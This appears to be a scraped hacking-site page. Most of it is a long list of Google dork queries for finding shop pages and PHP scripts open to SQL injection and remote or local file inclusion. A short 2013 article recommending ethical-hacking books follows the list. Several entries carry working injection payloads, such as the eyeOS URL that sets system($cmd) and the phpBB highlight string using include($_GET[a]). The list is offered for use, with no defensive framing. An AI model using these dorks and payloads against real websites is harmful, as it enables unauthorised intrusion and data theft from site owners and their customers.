inurl:”item.asp?shopcd=”
inurl:”item_details.asp?catid=”
inurl:”item_list.asp?maingroup”
inurl:”item_show.asp?code_no=”
inurl:”itemDesc.asp?CartId=”
inurl:”itemdetail.asp?item=”
inurl:”itemdetails.asp?catalogid=”
inurl:”learnmore.asp?cartID=”
inurl:”links.asp?catid=”
inurl:”list.asp?bookid=”
inurl:”List.asp?CatID=”
inurl:”listcategoriesandproducts.asp?idCategory=”
inurl:”modline.asp?id=”
inurl:”myaccount.asp?catid=”
inurl:”news.asp?id=”
inurl:”order.asp?BookID=”
inurl:”order.asp?id=”
inurl:”order.asp?item_ID=”
inurl:”OrderForm.asp?Cart=”
inurl:”page.asp?PartID=”
inurl:”payment.asp?CartID=”
inurl:”pdetail.asp?item_id=”
inurl:”powersearch.asp?CartId=”
inurl:”privacy.asp?cartID=”
inurl:”prodbycat.asp?intCatalogID=”
inurl:”prodetails.asp?prodid=”
inurl:”prodlist.asp?catid=”
inurl:”product.asp?bookID=”
inurl:”product.asp?intProdID=”
inurl:”product_info.asp?item_id=”
inurl:”productDetails.asp?idProduct=”
inurl:”productDisplay.asp”
inurl:”productinfo.asp?item=”
inurl:”productlist.asp?ViewType=Category&CategoryID= ”
inurl:”productpage.asp”
inurl:”products.asp?ID=”
inurl:”products.asp?keyword=”
inurl:”products_category.asp?CategoryID=”
inurl:”products_detail.asp?CategoryID=”
inurl:”productsByCategory.asp?intCatalogID=”
inurl:”prodView.asp?idProduct=”
inurl:”promo.asp?id=”
inurl:”promotion.asp?catid=”
inurl:”pview.asp?Item=”
inurl:”resellers.asp?idCategory=”
inurl:”results.asp?cat=”
inurl:”savecart.asp?CartId=”
inurl:”search.asp?CartID=”
inurl:”searchcat.asp?search_id=”
inurl:”Select_Item.asp?id=”
inurl:”Services.asp?ID=”
inurl:”shippinginfo.asp?CartId=”
inurl:”shop.asp?a=”
inurl:”shop.asp?action=”
inurl:”shop.asp?bookid=”
inurl:”shop.asp?cartID=”
inurl:”shop_details.asp?prodid=”
inurl:”shopaddtocart.asp”
inurl:”shopaddtocart.asp?catalogid=”
inurl:”shopbasket.asp?bookid=”
inurl:”shopbycategory.asp?catid=”
inurl:”shopcart.asp?title=”
inurl:”shopcreatorder.asp”
inurl:”shopcurrency.asp?cid=”
inurl:”shopdc.asp?bookid=”
inurl:”shopdisplaycategories.asp”
inurl:”shopdisplayproduct.asp?catalogid=”
inurl:”shopdisplayproducts.asp”
inurl:”shopexd.asp”
inurl:”shopexd.asp?catalogid=”
inurl:”shopping_basket.asp?cartID=”
inurl:”shopprojectlogin.asp”
inurl:”shopquery.asp?catalogid=”
inurl:”shopremoveitem.asp?cartid=”
inurl:”shopreviewadd.asp?id=”
inurl:”shopreviewlist.asp?id=”
inurl:”ShopSearch.asp?CategoryID=”
inurl:”shoptellafriend.asp?id=”
inurl:”shopthanks.asp”
inurl:”shopwelcome.asp?title=”
inurl:”show_item.asp?id=”
inurl:”show_item_details.asp?item_id=”
inurl:”showbook.asp?bookid=”
inurl:”showStore.asp?catID=”
inurl:”shprodde.asp?SKU=”
inurl:”specials.asp?id=”
inurl:”store.asp?id=”
inurl:”store_bycat.asp?id=”
inurl:”store_listing.asp?id=”
inurl:”Store_ViewProducts.asp?Cat=”
inurl:”store-details.asp?id=”
inurl:”storefront.asp?id=”
inurl:”storefronts.asp?title=”
inurl:”storeitem.asp?item=”
inurl:”StoreRedirect.asp?ID=”
inurl:”subcategories.asp?id=”
inurl:”tek9.asp?”
inurl:”template.asp?Action=Item&pid=”
inurl:”topic.asp?ID=”
inurl:”tuangou.asp?bookid=”
inurl:”type.asp?iType=”
inurl:”updatebasket.asp?bookid=”
inurl:”updates.asp?ID=”
inurl:”view.asp?cid=”
inurl:”view_cart.asp?title=”
inurl:”view_detail.asp?ID=”
inurl:”viewcart.asp?CartId=”
inurl:”viewCart.asp?userID=”
inurl:”viewCat_h.asp?idCategory=”
inurl:”viewevent.asp?EventID=”
inurl:”viewitem.asp?recor=”
inurl:”viewPrd.asp?idcategory=”
inurl:”ViewProduct.asp?misc=”
inurl:”voteList.asp?item_ID=”
inurl:”whatsnew.asp?idCategory=”
inurl:”WsAncillary.asp?ID=”
SQL DORK
inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
inurl:”id=” & intext:”Warning: mysql_fetch_array()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: is_writable()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: Unknown()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: pg_exec()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: mysql_query()
inurl:”id=” & intext:”Warning: array_merge()
inurl:”id=” & intext:”Warning: preg_match()
inurl:”id=” & intext:”Warning: ilesize()
inurl:”id=” & intext:”Warning: filesize()
inurl:”id=” & intext:”Warning: filesize()
inurl:”id=” & intext:”Warning: require()
inurl:(0x3a,version
inurl@version,0x3a,databse)
inurl:(user,0x3a,pass)
inurl:+union+select+ from
inurl:+union+select+ pass
inurl:+union+select+ SHOP
inurl:+union+select+ admin
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
RFI AND LFI
RFI
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/include/new-visitor.inc.php?lvc_include_dir=
inurl:/_functions.php?prefix=
inurl:/cpcommerce/_functions.php?prefix=
inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
inurl:/modules/agendax/addevent.inc.php?agendax_path=
inurl:/ashnews.php?pathtoashnews=
inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=
inurl:/pm/lib.inc.php?pm_path=
inurl:/b2-tools/gm-2-b2.php?b2inc=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/modules/agendax/addevent.inc.php?agendax_path=
inurl:/includes/include_once.php?include_file=
inurl:/e107/e107_handlers/secure_img_render.php?p=
inurl:/shoutbox/expanded.php?conf=
inurl:/main.php?x=
inurl:/myPHPCalendar/admin.php?cal_dir=
inurl:/index.php/main.php?x=
inurl:/index.php?include=
inurl:/index.php?x=
inurl:/index.php?open=
inurl:/index.php?visualizar=
inurl:/template.php?pagina=
inurl:/index.php?pagina=
inurl:/index.php?inc=
inurl:/includes/include_onde.php?include_file=
inurl:/index.php?page=
inurl:/index.php?pg=
inurl:/index.php?show=
inurl:/index.php?cat=
inurl:/index.php?file=
inurl:/db.php?path_local=
inurl:/index.php?site=
inurl:/htmltonuke.php?filnavn=
inurl:/livehelp/inc/pipe.php?HCL_path=
inurl:/hcl/inc/pipe.php?HCL_path=
inurl:/inc/pipe.php?HCL_path=
inurl:/support/faq/inc/pipe.php?HCL_path=
inurl:/help/faq/inc/pipe.php?HCL_path=
inurl:/helpcenter/inc/pipe.php?HCL_path=
inurl:/live-support/inc/pipe.php?HCL_path=
inurl:/gnu3/index.php?doc=
inurl:/gnu/index.php?doc=
inurl:/phpgwapi/setup/tables_update.inc.php?appdir=
inurl:/forum/install.php?phpbb_root_dir=
inurl:/includes/calendar.php?phpc_root_path=
inurl:/includes/setup.php?phpc_root_path=
inurl:/inc/authform.inc.php?path_pre=
inurl:/include/authform.inc.php?path_pre=
inurl:index.php?nic=
inurl:index.php?sec=
inurl:index.php?content=
inurl:index.php?link=
inurl:index.php?filename=
inurl:index.php?dir=
inurl:index.php?document=
inurl:index.php?view=
inurl:*.php?sel=
inurl:*.php?session=&content=
inurl:*.php?locate=
inurl:*.php?place=
inurl:*.php?layout=
inurl:*.php?go=
inurl:*.php?catch=
inurl:*.php?mode=
inurl:*.php?name=
inurl:*.php?loc=
inurl:*.php?f=
inurl:*.php?inf=
inurl:*.php?pg=
inurl:*.php?load=
inurl:*.php?naam=
allinurl:/index.php?page= site:*.dk
allinurl:/index.php?file= site:*.dk
INURL OR ALLINURL WITH:
/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=
/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/zentrack/index.php?configFile=
/main.php?x=
/becommunity/community/index.php?pageurl=
/GradeMap/index.php?page=
/index4.php?body=
/side/index.php?side=
/main.php?page=
/es/index.php?action=
/index.php?sec=
/index.php?main=
/index.php?sec=
/index.php?menu=
/html/page.php?page=
/page.php?view=
/index.php?menu=
/main.php?view=
/index.php?page=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/index.php?show=
/tutorials/print.php?page=
/index.php?page=
/index.php?level=
/index.php?file=
/index.php?inter_url=
/index.php?page=
/index2.php?menu=
/index.php?level=
/index1.php?main=
/index1.php?nav=
/index1.php?link=
/index2.php?page=
/index.php?myContent=
/index.php?TWC=
/index.php?sec=
/index1.php?main=
/index2.php?page=
/index.php?babInstallPath=
/main.php?body=
/index.php?z=
/main.php?view=
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
/index.php?file=
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=
2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=
4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=
5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
6. allinurl:ihm.php?p=
7. Keyword : “powered by AllMyLinks”
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=
10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=
11. keyword : “Powered by phpBB 2.0.6″
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=
12. keyword : “powered by CubeCart 3.0.6″
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
13. keyword : “powered by paBugs 2.0 Beta 3″
/class.mysql.php?path_to_bt_dir=
14. allinurl:”powered by AshNews”, allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=
15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
16. allinurl:ihm.php?p=*
14. keyword : “powered eyeOs”
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=
15. allinurl:.php?bodyfile=
16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
17. allinurl:forums.html
/modules.php?name=
18. allinurl:/default.php?page=home
19. allinurl:/folder.php?id=
20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=
21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( “powered by AllMyGuests”)
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
22. allinurl:application.php?base_path=
/application.php?base_path=
23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=
24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
25. key word : “powered by Fantastic News v2.1.2″
/archive.php?CONFIG[script_path]=
26. keyword: “powered by smartblog” AND inurl:?page=login
/index.php?page=
27. allinurl:/forum/
/forum/admin/index.php?inc_conf=
28. keyword:”Powered By FusionPHP”
/templates/headline_temp.php?nst_inc=
29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=
30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=
31. keyword : “Powered by iUser”
/common.php?include_path=
32. allinurl: “static.php?load=”
/static.php?load=
33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=
34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=
35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=
LFI
acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user=

THE BEST HACKING BOOKS YOU MUST READ TO BECOME A HACKER

best hacking books for beginner hacker
Hacking is considered to be a two-way tool wherein a computer system is penetrated either to make it more secure or to create mischief. Ethical hacking is defined as making use of programming skills, so as to penetrate a computer system, and determine its vulnerabilities. The ethical hackers are skilled computer experts, often called as the “white hats”. As against non-ethical hackers or “black hats” that penetrate into a computer system and exploit it for their own personal gains or mischief, the “white hats” evaluate and point out the vulnerabilities of system software, and suggest system changes to make it less penetrable.
With an increase in the use of Internet, concerns regarding its security have also grown manifold. This is particularly true in the case of highly confidential data. There have been past instances where the sites owned by even the most influential organizations have been hacked. This calls for designing systems which are impenetrable or an identification of the weaknesses of an existing system. Due to this reason, there is now a high demand for computer experts who can conduct ethical hacking operations.
Most of the organizations seek to acquire ethical hacking services from full-time employees or consultants so as to ensure security of their systems and information, thus making ethical hacking a highly lucrative profession.
Some of the best how to hack books that an aspiring ethical hacker must read are:

Hacking: The Art of Exploitation, 2nd Edition

This is one of the best books which will take you through the technicalities of areas like programming, shell code and exploitation. Regardless of whether you are a beginner or have very little hacking knowledge, this book will help you understand the complexities of the digital security tasks.
This excellent and well written book will make you learn all the clever stuff of getting access to a system. All in all, the best book to buy.

The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy (Syngress Basics Series)

The best thing about this book is that it covers all the basics of penetration testing and hacking, without assuming that the reader has any prior hacking knowledge. It provides a step-by-step journey of penetration testing, moving from Information Gathering to Scanning, Exploitation and finally, Report Writing.
Instead of dealing with individual concepts in-depth, this book will provide you with a wholesome picture of hacking.

Metasploit: The Penetration Tester's Guide

This book deals with Penetration Testing by making use of the open source Metasploit Framework testing. It is suitable for readers who have no prior knowledge of Metasploit. The tutorial-like style of the book makes you learn things by doing them.
The ending of the book provides you with an actual penetration test’s simulated version so as to provide you with a realistic experience.

BackTrack 5 Wireless Penetration Testing Beginner's Guide

Right from the beginning, this book gives you what you need, without wasting time in unnecessary justifications. Instead of explaining only theoretical concepts, the book consists of finely tuned and crystal clear tutorials. It provides a good mix of basics and high level knowledge and works cohesively with the reader.

CEH Certified Ethical Hacker All-in-One Exam Guide

This is undoubtedly one of the most well written books of all times. It provides crisp and clear writing with relevant examples along with a humorous touch to enliven the dry and mundane subject. The contents of the book are well organized in a neither too chatty nor too dry manner. However, you require some basic networking background to derive full benefits from this book.

CompTIA Security+: Get Certified Get Ahead: SY0-301 Study Guide

This certification book is easy to read, straightforward and explains some of the complex topics in an excellent manner. All you need to do in order to pass the test is to read the book and do the practice exercises.
In addition to this, the “remember this sections” and the content headers highlight all the key topics that one must pay attention to. So, if you wish to straightaway get down to the study material without wasting time on esoteric gibberish, this is the book for you.

Although, hacking may sound like an interesting area of study, when it comes to the application of the various concepts of penetration testing, it is easier said than done. In addition to having an educational background in the field of computer science, the hackers must have an affinity to learning and acquiring new skills on an ongoing basis. Also, the ethical hackers must possess out-of-the box thinking so that they are able to come with maximum number of possible ways of designing and securing a computer system.

 

Copyright @ 2013 TECMIE iCENTER.

.